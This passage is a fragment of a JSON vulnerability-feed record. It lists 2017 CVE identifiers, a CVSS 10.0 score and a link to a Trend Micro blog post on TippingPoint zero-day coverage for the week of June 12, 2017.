"CVE-2017-0283", "CVE-2017-8460", "CVE-2017-8509", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8551", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8512", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8520", "CVE-2017-8519", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8511", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-8510", "CVE-2017-8514", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8534", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-16T12:00:40", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-12-2017/", "id": "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}